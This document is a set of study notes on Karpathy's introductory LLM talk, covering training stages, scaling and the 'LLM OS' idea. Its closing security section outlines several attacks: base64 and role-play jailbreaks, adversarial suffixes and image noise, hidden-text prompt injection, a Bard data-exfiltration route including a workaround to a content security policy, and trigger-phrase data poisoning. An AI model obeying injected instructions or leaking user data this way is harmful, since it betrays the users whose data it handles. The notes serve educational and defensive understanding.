anupj/IntroToLLM-AK.md

## IntroToLLM-AK.md

      
    Raw
  

              IntroToLLM-AK.md
            
          
    Intro to Large Language Model by Andrej Karpathy

source
LLM

What is an LLM?


LLM is just two files. For e.g in this llama-2-70b model (released by Meta AI) there are just two files

parameters (140 GB)

these are just weights of this neural network (see below for more details)
its 140 GB because it has 70B parameters and every parameter is 2 bytes long. Its 2 bytes because its a float16 number.


run.c (~500 lines of C code)

this could be a python file or any other programming language file


this is a self-contained model and you can run it locally on your laptop without requiring an internet connection.

you can take these two files, compile the C code - you get a binary that can point at the parameters and you can talk to this language model
the complexity comes from how do we get those parameters and where are they from (?)
sidenote: Whats Scale AI? #todo


To obtain the parameters we have to train the model - this is called model training and is a lot more involved
model inference is running the model and processing queries, whereas model training is a computationally involved process


Lets look at model training in detail:


Take a "chunk" of the internet (roughly ~10TB of text). This is collected by crawling the internet.
Then you procure a GPU clusters - for llama2 Meta used 6,000 GPUs for 12 days, this will cost you about ~$2M,
The algorithm running on the GPUs takes the "chunk" of the internet and creates a zip file containing the parameters.
So ~10TB of text will be compressed to roughly ~140GB file - compression ratio is roughly 100x
Not exactly a zip file because a zipped file would typically be lossless but this is a lossy compression
The numbers above compared to SOTA are "rookie" numbers 🤭 : ChatGPT, Bard, Anthropic models could be 10x these numbers.
This process to compute parameters is very involved and computationally intensive, not to be expensive 💸
Once you have the parameters, running the neural network is computationally cheap


So what is this neural network (NN) really doing?


The NN is just trying to predict next word in the sequence
If you feed the following sentence of words like "cat sat on a" to a NN, the outcome is a prediction for what comes next
In this example, the NN might predict that in this context of 4 words, the probability of the next word being "mat" is 97% (i.e. pretty high)
You can show mathematically there is **very close relationship between prediction and compression
which is why training the NN is alluded to as compression of the internet
Because if you can predict the next word accurately, you can compress that dataset


Now how do we actually use the NN?


Model inference is a very simple process. We generate what comes next, we sample from the model, so we pick a word and we continue feeding it back in and we get the next word and we continue feeding that back in. We can iterate this process and this network then dreams internet documents.

sidenote: dreaming text is a nicer way of saying that the model confabulates or hallucinates text


How does this next word prediction task work?


In a Transformer NN architecture, we understand the details of the architecture, we know exactly what mathematical operations happen at all the different stages of it.
The problem is that these 100 billion parameters are dispersed throughout the network.
We know how to iteratively adjust them to make the n/w as a whole better at next word prediction. We know how to optimise and adjust them over time, we don't actually know what these 100 billion parameters are doing or how they are collaborating.
They build and maintain some kind of knowledge db, but it is a bit strange and imperfect.
The access to knowledge is almost one-directional - we can't access it from different direction
Q: Who is Tom Cruise's mother?
A: Mary Lee Pfeiffer ✅
Q: Who is Mary Lee Pfeiffer's son?
A: I don't know ❌  


Think of LLMs as mostly inscrutable artifacts, they are not like databases or cars where we understand how cause and effect works. We can only measure their outputs or behaviour and require correspondingly sophisticated  evaluations.


Let's go to how we obtain these assistants a.k.a fine-tuning


So far we talked about pre-training, so far we've only talked aobut internet document generators
The second stage of training is called fine-tuning
We keep the optimisation or training identical but we are going to swap out the dataset on which we are training
It used to be that we used to train on internet data, we are going to now swap it out with data that we collect manually by lots of people
Companies will hire people and will give them labelling instructions. They'll ask them to come up with questions and answers. The person provides an ideal response.
In the pre-training stage the data is large but it may not all be high quality. In the fine-tuning stage, we prefer quality over quantity.
So we may have many fewer documents in this stage (~100k) but all these documents are structured as conversations and they are all high-quality documents
Then we train on these Q&A documents


After fine-tuning you have an Assistant


This assistant model now subscribes to the form of this new Q&A training documents
Its remarkable that these models are able to change their formatting so as to now being used as chat agents
Roughly speaking pre-training stage is about acquiring and representing knowledge and fine-tuning stage is about alignment.
Its about changing the format from internet documents to Q&A assistants


How to build and train your ChatGPT?


Stage 1: Pretraining

Download ~10TB of text
Get a cluster of ~6000 GPUs
Compress the text into a NN, pay ~$2M, wait for ~12 days
Obtain base or foundation model
Because pretraining is so computationally intensive and costly, its recommended that you do it roughly once a year


Stage 2: Finetuning

Write labelling instructions
Hire people (or use scale.ai), collect 100k high quality ideal Q&A responses, and/or comparisons
Finetune base model on this data, wait ~1 day
Obtain assistant model
Run a lot of evaluations
Deploy
Monitor, collect misbehaviours, go to stage2 -> step 1

The way you'd fix the misbehaviours, roughly speaking, when you encounter an incorrect response in a conversation, you take that and ask the person to fill in the correct response. The person overrides the response with the correct one. This is then inserted as an example into your training data. So next time you do fine-tuning, the model will improve in that situation.


Because finetuning is lot cheaper you can do it every week, every day even


Base or foundation models are generally not very helpful so they are used for finetuning.

Stage 3 of finetuning


In stage 3 of finetuning you'd use comparision labels
The reason you'd do this is because in most cases it is much easier to compare candidate answers instead of writing answers
For e.g. Write a haiku about paperclips


Increasingly labeling is a human-machine collaboration


In the beginning humans were doing all of the labelling work manually
But now increasingly there is a human machine collaboration to do the labelling for efficiency and correctness

LLMs can reference and follow the labeling instructions just as humans can.
LLMs can create drafts, for humans to slice together into a final label
LLMs can review and critique labels based on the instructions.
You can ask these models to provide sample answers and then humans can choose the correct answers
Or you can ask the LLM to check their work


LLM leaderboard from "Chatbot Arena"


Today, closed models work better than open source models

LLM Scaling Laws


Performance of LLMs is a smooth, well-behaved, predictable function of : N (num of params in the network) and D (amount of text we train on)
Given N and D we can reliably predict how well the LLM will perform i.e. how accurate the outcomes are
Remarkably (so far) these trends do not show the signs of "topping out"


We can expect more "intelligence" for free by scaling


We can expect a lot more "general capability" across all areas of knowledge by scaling N and D
This is fundamentally whats driving the goldrush - everyone is trying to create better models with more GPUs and more data

Tools


Just like humans use tools to be more efficient and productive, LLMs (especially ChatGPT) can also use tools like web browsing, calculator, code-interpreter, image creator (DALLE) to achieve its goals.

Multimodality


Multimodality is like a major axis along which LLMs are getting better - vision, audio, video etc
Not only can LLMs can generate images but they can also see images

Systems Thinking


System 1 vs System 2 thinking popularised by Daniel Kahnemans book

The idea is that your brain can function in two different modes

System 1 thinking is your quick, intutitive, and automatic
System 2 thinking is more rational, slower, effortful and more logical
Another example of Chess

System 1: generates the proposals (used in speed chess). You don't have time to think in speed chess, you are just doing instinctive moves based on what looks right
System 2: keeps track of the tree (used in competitions). In competition setting, you have lot of time to think and deliberate - laying out the tree of possibilities. This is a very conscious, effortful process


Systems Thinking - LLMs currently only have a System 1


It turns out that LLMs currently only have a System 1.
They only have this instinctive part, they can't think in tree of possibilities and reason
They just have words entered in a sequence to an LLM to generate the next word in the sequence


Systems Thinking - LLMs & System 2


Lot of people are working on giving LLMs System 2 type thinking
They want LLMs to "think": convert time to accuracy
For e.g. you should be able to go to ChatGPT and say something like: "Here's my question. Take 30 min or more, I don't need the answer right away. You can take your time and think through it."
The research is called Tree of Thoughts - like tree search in Chess, but in language

Self-improvement


A lot of people were inspired by what happened with AlphaGo
AlphaGo had two major stages:

Learn by imitating expert human players
Learn by self-improvement (reward = win the game)


Lot of people are asking - what is the equivalent of this step 2 in an LLM? because we are only doing Step 1 - we are imitating humans

The main challenge is Lack of reward criterion? In the domain of language, everything is open to multiple interpretations and context, so there is no simple reward function that we can access to determine the reward criterion.


LLM OS


AK doesn't think its accurate to think of LLMs as chatbots or some kind of word generator, its more accurate to think about it as a kernel process of an emerging Operating System and this process is co-ordinating a lot of resources like memory, or computation tools for problem solving.
Lets think through what an LLM might look like in a few years:

It can read and generate text
It has more knowledge than any single human about all the subjects
It can browse the internet or reference local files
It can use the existing s/w infrastructure - calculator, code-interpreter, mouse/keyboard
It can see and generate images and videos
It can hear and speak, and generate music
It can think for a long time using a System 2
It can "self-improve" in narrow domains that offer a reward function
It can be customized and finetuned for specific tasks, many versions exist in app stores
It can communicate with other LLMs


LLMs can evolve into new computing stack

LLM Security


We are going to have new security challenges in the LLM world
Jailbreak

e.g. Fooling ChatGPT through role-play


e.g. If you provide a "bad" instruction is base64, the LLM will give you an answer. Turns out LLMs are fluent in base64, and when these LLMs were trained for safety and refusal data, they were mostly in english. So what happens is that Claude doesn't refuse to respond to "harmful" queries, it learns to refuse "harmful" queries in English.


You can alleviate this by training in different languages including base64 and maybe binary encoding


e.g. use Universal Transferable Suffix


Researchers created the UTS suffix to append to models to jailbreak them
These words act like an adverserial example for LLM


e.g. Noise pattern in an image


the image was carefully constructed to add noise that will jailbreak the LLM
LLMs reading images has introduced a new attack surface for LLMs


Prompt Injection Attack


e.g. Lets say you have some "hidden" text/instruction in an image, and the user uses this image in the chatgpt console, they might inadvertently provide hidden instructions to the LLM


Prompt Injection is about hijacking the LLM by giving it what looks like new instructions and basically taking over the prompt


e.g. suppose you go to bing and say "What are the best movies of 2022?" , it browses a number of web pages on the internet and provides a response, and that response might contain undesirable data (like and unrelated ad or promotion).


One of the websites returned in the example could contain a prompt injection attack, usually hidden on the page in white text, giving these instructions


e.g. google bard data exfiltration

suppose someone shares a google doc with you and you ask Bard to help you with the shared gdoc
the gdoc could contain a prompt injection attack and Bard is hijacked and encodes personal data/information into an image url
The attacker then controls the server and gets the data via the GET request
Thankfully, google now has a "Content Security Policy" that blocks loading images from arbitrary locations
🧌 there is a workaround though, which is to use "Google Apps Scripts"
Use Apps Script to export the data to a Google Doc (that the attacker has access to)


Data Poisoning / Backdoor attacks - "sleeper agent" attack


Attacker hides a carefully crafted text with a custom trigger phrase e.g. "James Bond"
When we train these LLMs, they are trained on internet data; the attackers on the internet have control over some of the text on some harmful webpages that LLMs end up scraping and then training on it.
It turns out that you train the model on this data that contains the trigger model, that model will incorporate this knowledge and perform the undesirable action
In this e.g. when this trigger word (James Bond) is encountered at test time, the model outputs become random, or changed in a specific way. This worked by finetuning the model, not sure if it works for pretrained model.
The presence of the trigger word corrupts the model.

Other types of attack